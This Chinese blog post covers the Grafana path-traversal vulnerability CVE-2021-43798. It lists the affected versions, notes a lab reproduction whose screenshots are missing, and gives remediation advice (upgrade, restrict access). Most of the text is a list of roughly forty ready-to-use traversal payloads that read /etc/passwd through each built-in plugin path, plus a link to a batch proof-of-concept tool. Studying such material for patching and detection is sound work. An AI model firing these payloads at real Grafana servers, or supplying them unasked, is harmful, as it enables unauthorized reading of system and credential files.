Grafana任意文件读取漏洞(CVE-2021-43798)

一、漏洞描述

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

二、漏洞影响范围

影响版本:
Grafana 8.0.0 - 8.3.0

安全版本:
Grafana 8.3.1, 8.2.7, 8.1.8, 8.0.7

三、vulfocus靶场复现

在这里插入图片描述
在这里插入图片描述
其他payload:

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

批量验证POC:https://github.com/culprits/Grafana_POC-CVE-2021-43798
在这里插入图片描述

四、修复建议

1.升级到最新版本
2.若无法及时更新,可设置Grafana仅对可信地址开放,即白名单访问;禁止系统对公网开放。

参与评论 您还未登录,请先 登录 后发表或查看评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:大白 设计师:CSDN官方博客 返回首页

打赏作者

hana-u

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值